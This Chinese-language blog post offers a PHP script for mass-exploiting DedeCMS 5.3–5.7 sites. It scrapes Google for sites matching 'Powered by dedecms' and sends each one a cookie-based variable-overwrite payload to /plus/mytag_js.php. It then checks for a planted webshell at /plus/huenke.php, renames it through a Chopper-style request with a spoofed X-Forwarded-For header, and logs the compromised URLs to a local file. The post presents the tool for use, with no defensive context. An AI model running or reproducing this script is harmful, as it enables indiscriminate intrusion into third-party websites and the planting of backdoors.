正在加载中……
最新消息:欢迎大家访问,导航分类不完善,如果找不到自己想要的文章,可以通过【关键词】来进行搜索,^_^!

dedecms5.3-5.7批量getwebshell代码

CMS相关 REKFAN.COM 16778浏览 0评论

更多


<?php
print_r('
[-]Exploit Title: DEDEcms Variable coverage
[-]Date: 1182011
[-]Getshell Author: cfking#90sec.org
[-]Site from google
'
);
error_reporting(E_ERROR);
set_time_limit(0);
$keyword='Powered by dedecms' ;//搜索关键字
$timeout = 30;
$stratpage = 5;
$lastpage = 10000000; //
for ($i=$stratpage ; $i<=$lastpage ; $i++ ){
$array=ReadgoogleList($keyword,$timeout,$i);
foreach ($array as $url ){
$url_list=file('c:/url.txt');
if (in_array("$urlrn",$url_list)){
echo "[*] Links repeatn";
}else{
$fp = @fopen('c:/url.txt', 'a');
@fwrite($fp, $url."rn");
@fclose($fp);
print_r("
[-] Geting URL: $urlrn");
$exploit=Getshell($url);
if (strpos($exploit,"OK")>2){
echo "[*] ".$url."/plus/huenke.phprn";
$name=rname($url);
if(strpos($name,"200")>5){
echo "[*] Rename Successn";
echo "[*] Record Successn";
$fp = @fopen('c:/shell.txt', 'a');
@fwrite($fp, $url."/plus/huenke.phprn");
@fclose($fp); }
}
}
}
}
/**漏洞利用**/
function Getshell($url){//下面$content这里需要自己修改一下
$host=$url;
$port="80";
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=IP地址&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=数据库用户名&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=数据库密码&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=数据库名称&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";//自己抓包修改
$data = "POST /plus/mytag_js.php?aid=1 HTTP/1.1rn";
$data .= "Host: ".$host."rn";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1rn";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8rn";
$data .= "Accept-Language: zh-cn,zh;q=0.5rn";
//$data .= "Accept-Encoding: gzip,deflatern";
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7rn";
$data .= "Connection: keep-alivern";
$data .= "Content-Type: application/x-www-form-urlencodedrn";
$data .= "Content-Length: ".strlen($content)."rnrn";
$data .= $content."rn";
$ock=fsockopen($host,$port);
if (!$ock) {
echo "[*] No response from $host n";
}
fwrite($ock,$data);
while (!feof($ock)) {
$exp=fgets($ock, 1024);
return $exp;
}
}
/**返回该页网址列表**/
function ReadgoogleList($keyword,$timeout,$nowpage)
{
$tmp = array();
$data = '';
$nowpage = ($nowpage-1)*10;
$fp = @fsockopen('www.google.com.hk',80,$errno,$errstr,$timeout);
@fputs($fp,"GET /search?q=".urlencode($keyword)."&start=".$nowpage." HTTP/1.1rnHost:www.google.com.hkrnConnection: Closernrn");
while ($fp && !feof($fp))
$data .= fread($fp, 102400);
@fclose($fp);
preg_match_all("/<cite>(.*?)//",$data,$tmp);
$num = count($tmp[1]);
$array = array();
for($i = 0;$i < $num;$i++)
{
$row = explode('/',$tmp[1][$i]);
$array[] = str_replace('http://','',$row[0]);
}
return $array;
}
/** 修改漏洞文件的名称防止再次被利用**/
function rname($url){//根据说明填写下
$host=$url;
$port="80";
$content ='';//自己抓包修改 菜刀的包
$data = "POST /plus/你后门地址 HTTP/1.1rn";
$data .= "X-Forwarded-For: 199.1.88.29rn";
$data .= "Referer: http://$hostrn";
$data .= "Content-Type: application/x-www-form-urlencodedrn";
$data .= "User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0rn";
$data .= "Host: $hostrn";
$data .= "Content-Length: ".strlen($content)."rn";
$data .= "Cache-Control: no-cachernrn";
$data .= $content."rn";
$ock=fsockopen($host,$port); if (!$ock) {
echo "[*] No response from $host rn";
}
fwrite($ock,$data);
while (!feof($ock)) {
$exp=fgets($ock, 1024);
return $exp;
}
} ?>

转载请注明:|REKFAN|系统运维| » dedecms5.3-5.7批量getwebshell代码

表情

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址